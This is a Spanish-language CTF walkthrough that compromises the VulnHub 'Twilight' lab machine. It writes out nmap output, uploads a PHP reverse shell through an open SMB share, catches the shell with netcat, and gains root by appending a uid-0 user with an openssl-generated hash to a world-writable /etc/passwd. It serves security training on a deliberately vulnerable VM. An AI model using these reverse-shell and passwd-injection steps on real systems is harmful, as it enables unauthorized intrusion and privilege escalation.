[VULNHUB] TWILIGHT

Hoy vamos a hackear la maquina de Vulnhub llamada Twilight. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/sunset-twilight,512/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.59 8s Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 02:19 CEST Nmap scan report for twilight.home (192.168.1.59) Host is up (0.00032s latency). Not shown: 65526 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 43:e9:45:ec:f4:5b:ed:e9:64:47:43:43:39:96:9d:c9 (RSA) | 256 ed:67:ad:31:04:17:ef:cf:75:02:05:db:88:94:97:a0 (ECDSA) |_ 256 ed:41:e5:d1:b2:23:2c:d5:90:59:2a:37:8b:da:31:c1 (ED25519) 25/tcp open smtp Exim smtpd | smtp-commands: twilight Hello twilight.home [192.168.1.111], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP, |_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP) 2121/tcp open ftp pyftpdlib 1.5.6 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 root root 35 Jul 16 12:21 22253251-65325.twilight | ftp-syst: | STAT: | FTP server status: | Connected to: 192.168.1.59:2121 | Waiting for username. | TYPE: ASCII; STRUcture: File; MODE: Stream | Data connection closed. |_End of status. 3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1 | mysql-info: | Protocol: 10 | Version: 5.5.5-10.3.22-MariaDB-0+deb10u1 | Thread ID: 39 | Capabilities flags: 63486 | Some Capabilities: LongColumnFlag, Support41Auth, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, SupportsTransactions, InteractiveClient, Speaks41ProtocolNew, FoundRows, SupportsCompression, IgnoreSigpipes, ODBCClient, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins | Status: Autocommit | Salt: P8cjiTFC]*X]K@, NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.5-Debian) | Computer name: twilight | NetBIOS computer name: TWILIGHT\x00 | Domain name: \x00 | FQDN: twilight |_ System time: 2020-07-27T16:20:15-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-07-27T20:20:14 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Tras mirar por encima todos los servicios, echamos un vistazo mas en detalle al Samba. Miramos si tiene algun carpeta que nos llame la atencion.
    ~ > smbclient -L 192.168.1.59 Enter WORKGROUP\sml's password: Sharename Type Comment --------- ---- ------- WRKSHARE Disk Workplace Share. Do not access if not an employee. print$ Disk Printer Drivers IPC$ IPC IPC Service (Samba 4.9.5-Debian) SMB1 disabled -- no workgroup available
    Vemos la carpeta, WRKSHARE, nos conectamos a ella.
    ~ > smbclient \\\\192.168.1.59\\WRKSHARE Enter WORKGROUP\sml's password: Try "help" to get a list of possible commands. smb: \>
    Al hacer "dir" vemos que estamos en la raiz del sistema. Si visitamos "/var/www/html" vemos que aparecen los mismos ficheros que se muestran en el puerto 80 :) Teniendo esto en cuenta preparamos una reverse shell.
    ~ > cp /usr/share/webshells/php/php-reverse-shell . ~ > mv php-reverse-shell rshell.php ~ > nano rshell.php #MODIFICAMOS IP
    Una vez la tenemos preparada, la subimos!
    smb: \var\www\html\> put rshell.php putting file rshell.php as \var\www\html\rshell.php (2683,0 kb/s) (average 1085,9 kb/s) smb: \var\www\html\>
    Ponemos nc a la escucha.
    ~ > nc -nlvp 1234 listening on [any] 1234 ...
    Y visitamos http://192.168.1.59/rshell.php
  • Low Shell
  • ~ > nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.1.111] from (UNKNOWN) [192.168.1.70] 59268 Linux twilight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux 10:51:53 up 4 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@twilight:/$
  • Privilege Escalation
  • Explorando el sistema, vemos que podemos modificar el fichero /etc/passwd.
    www-data@twilight:/$ ls -l /etc/passwd ls -l /etc/passwd -rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd
    Vamos a agregar un usuario al fichero /etc/passwd con los privilegios de root! Para ello nos generamos un password(123) en nuestra maquina ejecutando:
    ~ > openssl passwd -1 -salt new 123 $1$new$p7ptkEKU1HnaHpRtzNizS1
    Agregamos el usuario "lacashita" con privilegios de root y la password que hemos creado anteriormente al fichero /etc/passwd.
    www-data@twilight:/$ echo "lacashita:\$1\$new\$p7ptkEKU1HnaHpRtzNizS1:0:0:ruut:/root:/bin/bash" >> /etc/passwd
    Cambiamos de usuario!
    www-data@twilight:/$ su lacashita su lacashita Password: 123 root@twilight:/# id uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • root@twilight:/# cd /root root@twilight:~# ls root.txt root@twilight:~# cat root.txt (\ \'\ \'\ __________ / '| ()_________) \ '/ \ ~~~~~~~~ \ \ \ ~~~~~~ \ ==). \__________\ (__) ()__________) 34d3ecb1bbd092bcb87954cee55d88d3 Thanks for playing! - Felipe Winsnes (@whitecr0wz) root@twilight:~#
  • End
  • Y con esto ya seriamos root de la maquina